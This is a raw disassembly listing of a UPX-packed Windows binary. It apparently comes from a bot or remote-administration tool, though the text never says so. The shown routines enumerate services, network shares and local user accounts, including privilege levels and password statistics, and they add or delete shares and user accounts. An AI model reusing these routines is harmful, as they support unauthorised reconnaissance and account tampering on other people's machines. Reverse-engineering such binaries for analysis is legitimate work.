jz short loc_418842
dec ecx
dec ecx
jz short loc_418838
dec ecx
jz short loc_41882E
sub ecx, 51h
jz short loc_418824
sub ecx, 24h
jnz loc_418909 ; default
; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_4188FB
; ---------------------------------------------------------------------------
loc_418824: ; CODE XREF: sub_4187DE+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_4188FB
; ---------------------------------------------------------------------------
loc_41882E: ; CODE XREF: sub_4187DE+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_4188FB
; ---------------------------------------------------------------------------
loc_418838: ; CODE XREF: sub_4187DE+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_4188FB
; ---------------------------------------------------------------------------
loc_418842: ; CODE XREF: sub_4187DE+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_4188FB
; ---------------------------------------------------------------------------
loc_41884C: ; CODE XREF: sub_4187DE+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_4188FB
; ---------------------------------------------------------------------------
loc_418856: ; CODE XREF: sub_4187DE+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_418885
dec ecx
jz short loc_41887E
dec ecx
jz short loc_418877
dec ecx
jnz loc_418909 ; default
; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_4188FB
; ---------------------------------------------------------------------------
loc_418877: ; CODE XREF: sub_4187DE+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_41887E: ; CODE XREF: sub_4187DE+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_418885: ; CODE XREF: sub_4187DE+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_41888C: ; CODE XREF: sub_4187DE+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_418893: ; CODE XREF: sub_4187DE+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_418909 ; default
; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16
jz short loc_4188F6
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_418909 ; default
; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_41894A[ecx]
jmp off_418922[ecx*4] ; switch jump
loc_4188B7: ; DATA XREF: UPX0:off_418922�o
push offset aTheSpecifiedDa ; jumptable 004188B0 case 7
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188BE: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheServiceDepe ; jumptable 004188B0 case 17
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188C5: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheServiceDe_0 ; jumptable 004188B0 case 10
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188CC: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheServiceHasB ; jumptable 004188B0 case 0
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188D3: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheSpecified_0 ; jumptable 004188B0 case 2
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188DA: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheServiceCoul ; jumptable 004188B0 case 11
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188E1: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheServiceHa_0 ; jumptable 004188B0 case 14
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188E8: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheRequested_1 ; jumptable 004188B0 case 3
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188EF: ; CODE XREF: sub_4187DE+D2�j
; DATA XREF: UPX0:off_418922�o
push offset aTheServiceHasN ; jumptable 004188B0 case 4
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188F6: ; CODE XREF: sub_4187DE+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_4188FB: ; CODE XREF: sub_4187DE+41�j
; sub_4187DE+4B�j ...
push offset dword_4DB010
call sub_41B886
pop ecx
pop ecx
jmp short loc_41891C
; ---------------------------------------------------------------------------
loc_418909: ; CODE XREF: sub_4187DE+36�j
; sub_4187DE+89�j ...
push eax ; default
; jumptable 004188B0 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset dword_4DB010
call sub_41B886
add esp, 0Ch
loc_41891C: ; CODE XREF: sub_4187DE+129�j
mov eax, offset dword_4DB010
retn
sub_4187DE endp
; ---------------------------------------------------------------------------
off_418922 dd offset loc_4188CC ; DATA XREF: sub_4187DE+D2�r
dd offset loc_4188D3 ; jump table for switch statement
dd offset loc_4188E8
dd offset loc_4188EF
dd offset loc_4188B7
dd offset loc_4188C5
dd offset loc_4188DA
dd offset loc_4188E1
dd offset loc_4188BE
dd offset loc_418909
byte_41894A db 0, 9, 1, 2 ; DATA XREF: sub_4187DE+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41895C proc near ; CODE XREF: sub_401ACD+45D4�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call ds:dword_4CB648 ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_418994: ; CODE XREF: sub_41895C+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call ds:dword_4CB614 ; EnumServicesStatusA
test eax, eax
jnz short loc_4189CE
call dword_42708C ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_418A82
loc_4189CE: ; CODE XREF: sub_41895C+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_418A79
lea esi, [ebp+var_188]
loc_4189DF: ; CODE XREF: sub_41895C+117�j
mov eax, [esi+8]
dec eax
jz short loc_418A28
dec eax
jz short loc_418A21
dec eax
jz short loc_418A1A
dec eax
jz short loc_418A13
dec eax
jz short loc_418A0C
dec eax
jz short loc_418A05
dec eax
jz short loc_4189FE
push offset aUnknown_0 ; " Unknown"
jmp short loc_418A2D
; ---------------------------------------------------------------------------
loc_4189FE: ; CODE XREF: sub_41895C+99�j
push offset aPaused_0 ; " Paused"
jmp short loc_418A2D
; ---------------------------------------------------------------------------
loc_418A05: ; CODE XREF: sub_41895C+96�j
push offset aPausing ; " Pausing"
jmp short loc_418A2D
; ---------------------------------------------------------------------------
loc_418A0C: ; CODE XREF: sub_41895C+93�j
push offset aContinuing ; " Continuing"
jmp short loc_418A2D
; ---------------------------------------------------------------------------
loc_418A13: ; CODE XREF: sub_41895C+90�j
push offset aRunning ; " Running"
jmp short loc_418A2D
; ---------------------------------------------------------------------------
loc_418A1A: ; CODE XREF: sub_41895C+8D�j
push offset aStoping ; " Stoping"
jmp short loc_418A2D
; ---------------------------------------------------------------------------
loc_418A21: ; CODE XREF: sub_41895C+8A�j
push offset aStarting ; " Starting"
jmp short loc_418A2D
; ---------------------------------------------------------------------------
loc_418A28: ; CODE XREF: sub_41895C+87�j
push offset aStopped ; " Stopped"
loc_418A2D: ; CODE XREF: sub_41895C+A0�j
; sub_41895C+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS ; "%s: %s (%s)"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_4189DF
loc_418A79: ; CODE XREF: sub_41895C+77�j
cmp [ebp+var_8], ebx
jnz loc_418994
loc_418A82: ; CODE XREF: sub_41895C+6C�j
push [ebp+var_C]
call ds:dword_4CB54C ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_41895C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A99 proc near ; CODE XREF: sub_401ACD:loc_406167�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_418B33
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_418AC2
dec eax
jnz short loc_418B13
push edi
push 0
call sub_418C6C
pop ecx
pop ecx
jmp short loc_418B0F
; ---------------------------------------------------------------------------
loc_418AC2: ; CODE XREF: sub_418A99+18�j
cmp [ebp+arg_8], 0
jnz short loc_418B01
push 24h
push edi
call sub_41BFB0
pop ecx
test eax, eax
pop ecx
jnz short loc_418B01
push 57h
pop eax
loc_418AD9: ; CODE XREF: sub_418A99+78�j
push eax
call sub_419460
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_4DB2CC
push off_439090[eax*4]
push offset unk_43973C
push esi
call sub_41B886
add esp, 14h
jmp short loc_418B53
; ---------------------------------------------------------------------------
loc_418B01: ; CODE XREF: sub_418A99+2D�j
; sub_418A99+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_418BC0
add esp, 0Ch
loc_418B0F: ; CODE XREF: sub_418A99+27�j
test eax, eax
jnz short loc_418AD9
loc_418B13: ; CODE XREF: sub_418A99+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset dword_4DB2CC
push off_439094[eax*4]
push offset dword_439720
push esi
call sub_41B886
add esp, 10h
jmp short loc_418B53
; ---------------------------------------------------------------------------
loc_418B33: ; CODE XREF: sub_418A99+A�j
mov eax, [ebp+arg_0]
mov esi, offset dword_4DB2CC
lea eax, [eax+eax*2]
push off_439090[eax*4]
push offset unk_4396FC
push esi
call sub_41B886
add esp, 0Ch
loc_418B53: ; CODE XREF: sub_418A99+66�j
; sub_418A99+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_418A99 endp
; =============== S U B R O U T I N E =======================================
sub_418B59 proc near ; CODE XREF: sub_419E7A+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_418B66
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_418B66: ; CODE XREF: sub_418B59+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, dword_42717C
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test ds:byte_4DB4CC, 1
mov ebp, eax
jnz short loc_418BA3
or ds:byte_4DB4CC, 1
lea eax, [ebp+1]
push eax
call sub_41CFC5
pop ecx
mov ds:dword_4DB26C, eax
loc_418BA3: ; CODE XREF: sub_418B59+32�j
push esi
push esi
push ebp
push ds:dword_4DB26C
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, ds:dword_4DB26C
pop edi
pop ebp
pop ebx
pop esi
retn
sub_418B59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418BC0 proc near ; CODE XREF: sub_418A99+6E�p
; sub_41A19E+18A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_418C2B
push [ebp+arg_4]
mov edi, eax
call sub_418C2B
push 24h
mov [ebp+var_20], eax
push [ebp+arg_4]
call sub_41BFB0
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_418C2B
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call ds:dword_4CB548
pop edi
leave
retn
sub_418BC0 endp
; =============== S U B R O U T I N E =======================================
sub_418C2B proc near ; CODE XREF: sub_418BC0+A�p
; sub_418BC0+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_418C38
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418C38: ; CODE XREF: sub_418C2B+9�j
push ebx
push esi
mov esi, dword_427180
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_41CFC5
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_418C2B endp
; =============== S U B R O U T I N E =======================================
sub_418C6C proc near ; CODE XREF: sub_418A99+20�p
; sub_419E7A+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_418C2B
push [esp+8+arg_4]
mov esi, eax
call sub_418C2B
pop ecx
pop ecx
push 0
push eax
push esi
call ds:dword_4CB520
pop esi
retn
sub_418C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C8F proc near ; CODE XREF: sub_401ACD+46B1�p
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_418C2B
xor esi, esi
mov [ebp+var_C], eax
push esi
mov [ebp+arg_C], esi
push [ebp+arg_8]
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 18h
loc_418CC8: ; CODE XREF: sub_418C8F+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call ds:dword_4CB598
mov ebx, eax
cmp ebx, esi
jz short loc_418D2B
cmp ebx, 0EAh
jz short loc_418D2B
push ebx
push ebx
call sub_419460
pop ecx
push eax
lea eax, [ebp+var_210]
push offset unk_439788
push eax
call sub_41B886
push esi
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 24h
jmp short loc_418D98
; ---------------------------------------------------------------------------
loc_418D2B: ; CODE XREF: sub_418C8F+5D�j
; sub_418C8F+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_418D8F
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_418D39: ; CODE XREF: sub_418C8F+FC�j
push dword ptr [esi+10h]
call ds:dword_4CB53C ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_418D50
mov eax, offset aNo ; "No"
loc_418D50: ; CODE XREF: sub_418C8F+BA�j
push eax
lea eax, [ebp+var_210]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_210]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_418D39
xor esi, esi
loc_418D8F: ; CODE XREF: sub_418C8F+A2�j
push [ebp+var_4]
call ds:dword_4CB6E4
loc_418D98: ; CODE XREF: sub_418C8F+9A�j
cmp ebx, 0EAh
jz loc_418CC8
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_418C8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DB0 proc near ; CODE XREF: sub_401ACD:loc_4061EF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_418E55
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_418DF2
dec eax
jz short loc_418DE7
dec eax
jnz short loc_418E0D
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_418EF7
add esp, 14h
jmp short loc_418E09
; ---------------------------------------------------------------------------
loc_418DE7: ; CODE XREF: sub_418DB0+1D�j
push ebx
push edi
call sub_418ED6
pop ecx
pop ecx
jmp short loc_418E09
; ---------------------------------------------------------------------------
loc_418DF2: ; CODE XREF: sub_418DB0+1A�j
cmp [ebp+arg_8], edi
jz short loc_418E06
push [ebp+arg_8]
push ebx
push edi
call sub_418E7C
add esp, 0Ch
jmp short loc_418E09
; ---------------------------------------------------------------------------
loc_418E06: ; CODE XREF: sub_418DB0+45�j
push 57h
pop eax
loc_418E09: ; CODE XREF: sub_418DB0+35�j
; sub_418DB0+40�j ...
cmp eax, edi
jnz short loc_418E2D
loc_418E0D: ; CODE XREF: sub_418DB0+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_4DB4D0
push off_439094[eax*4]
push offset unk_439840
push esi
call sub_41B886
add esp, 10h
jmp short loc_418E75
; ---------------------------------------------------------------------------
loc_418E2D: ; CODE XREF: sub_418DB0+5B�j
push eax
call sub_419460
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset dword_4DB4D0
push off_439090[eax*4]
push offset unk_439810
push esi
call sub_41B886
add esp, 14h
jmp short loc_418E75
; ---------------------------------------------------------------------------
loc_418E55: ; CODE XREF: sub_418DB0+D�j
mov eax, [ebp+arg_0]
mov esi, offset dword_4DB4D0
lea eax, [eax+eax*2]
push off_439090[eax*4]
push offset unk_4397E8
push esi
call sub_41B886
add esp, 0Ch
loc_418E75: ; CODE XREF: sub_418DB0+7B�j
; sub_418DB0+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_418DB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418E7C proc near ; CODE XREF: sub_418DB0+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_418C2B
push [ebp+arg_4]
mov edi, eax
call sub_418C2B
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_418C2B
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call ds:dword_4CB52C
pop edi
leave
retn
sub_418E7C endp
; =============== S U B R O U T I N E =======================================
sub_418ED6 proc near ; CODE XREF: sub_418DB0+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_418C2B
push [esp+8+arg_4]
mov esi, eax
call sub_418C2B
pop ecx
pop ecx
push eax
push esi
call ds:dword_4CB51C
pop esi
retn
sub_418ED6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418EF7 proc near ; CODE XREF: sub_418DB0+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_418C2B
push [ebp+arg_4]
mov esi, eax
call sub_418C2B
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call ds:dword_4CB6AC
test eax, eax
mov [ebp+arg_0], eax
jnz loc_41929F
mov eax, [ebp+var_4]
test eax, eax
jz loc_4192DA
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_41B886
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_419016
dec eax
jz short loc_41900F
dec eax
jz short loc_419008
mov eax, offset aUnknown ; "Unknown"
jmp short loc_41901B
; ---------------------------------------------------------------------------
loc_419008: ; CODE XREF: sub_418EF7+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_41901B
; ---------------------------------------------------------------------------
loc_41900F: ; CODE XREF: sub_418EF7+105�j
mov eax, offset aUser_2 ; "User"
jmp short loc_41901B
; ---------------------------------------------------------------------------
loc_419016: ; CODE XREF: sub_418EF7+102�j
mov eax, offset aGuest ; "Guest"
loc_41901B: ; CODE XREF: sub_418EF7+10F�j
; sub_418EF7+116�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_41B886
push 1
push esi
lea eax, [ebp+var_204]
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409A73
add esp, 20h
pop edi
pop ebx
jmp short loc_4192CB
; ---------------------------------------------------------------------------
loc_41929F: ; CODE XREF: sub_418EF7+35�j
push eax
lea eax, [ebp+var_204]
push offset unk_439860
push eax
call sub_41B886
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_409A73
add esp, 20h
loc_4192CB: ; CODE XREF: sub_418EF7+3A6�j
cmp [ebp+var_4], 0
jz short loc_4192DA
push [ebp+var_4]
call ds:dword_4CB6E4
loc_4192DA: ; CODE XREF: sub_418EF7+40�j
; sub_418EF7+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_418EF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192E0 proc near ; CODE XREF: sub_401ACD+473C�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_418C2B
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 18h
loc_41931F: ; CODE XREF: sub_4192E0+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
